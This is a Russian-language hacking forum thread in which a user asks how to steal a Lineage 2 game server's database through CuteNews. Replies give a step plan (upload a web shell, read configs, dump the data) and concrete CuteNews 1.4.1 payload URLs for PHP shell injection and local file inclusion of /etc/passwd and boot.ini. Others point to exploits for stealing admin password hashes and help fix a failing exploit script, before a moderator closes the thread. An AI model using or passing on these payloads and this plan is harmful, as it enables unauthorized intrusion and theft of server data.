Пипл плс не удаляйте тему, ищу поиском нечё толкового ненаходит :(

Как можно через CuteNews угнать базу (допустим сервака ла2) помогите плс... Заранее спс!

Заливаешь шелл, смотришь конфиги -> коннектишся к серверу l2 -> сливаешь данные...

CuteNews 1.4.1 Shell Injection
show_archives.php ?template=../inc/ipban.mdu%00&member_db[1]=1&action=add&add_ip=%22%3C?php%20echo%20md5(%22test%22)
;%20die;?%3E.%22%20HTTP/1.0\r\n
Cute News 1.4.1 Local File Inclusion
show_archives.php?template=../../../../../../../../../../etc/passwd%00
show_archives.php?template=../../../../../../../../../../boot.ini%00
Попробуй мож получиться

Короче там уязвимость через moy-web и Cute News 1.4.1
Получаеш доступ к базе...

Уязвимость по которой можно получить доступ к главной страничке кто знает что это такое
админка там в _http://sayt-l2-moyweb/news/
Эксплойты на узнавание ника и хеша пароля
_http://www.waraxe.us/tools/
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки, позволяющей получить MD5 хэш администратора, с использованием $_COOKIE. Атакующий может получить несанкционированный доступ к конфиденциальной информации на целевой системе.

Хммм...указал я путь до search.php
А какой ник вводить в эксплойте?

И когда запускаю эксплойт то он мне пишет:
Validating target URL

Fatal error: Call to undefined function curl_init() in C:\...CuteNewsEx.php on
line 227

А какой ник вводить в эксплойте?

А собственно зачем тебе вообще это всё нужно, если ты даже не знаешь что делает эксплойт который ты юзаешь? Помоему оно тебе просто не нужно.

И когда запускаю эксплойт то он мне пишет:

Он тебе пишет что функция не инициализирована.
Это наверное потому что ты не поставил бибилиотеку с Курлом - поставь бибилотеку - будет работать.

P.S. закрыто.
P.P.S. вообще классная тема, звучит как "плиз, сломайте за меня, а то я ничего не умею делать, но очень хочется".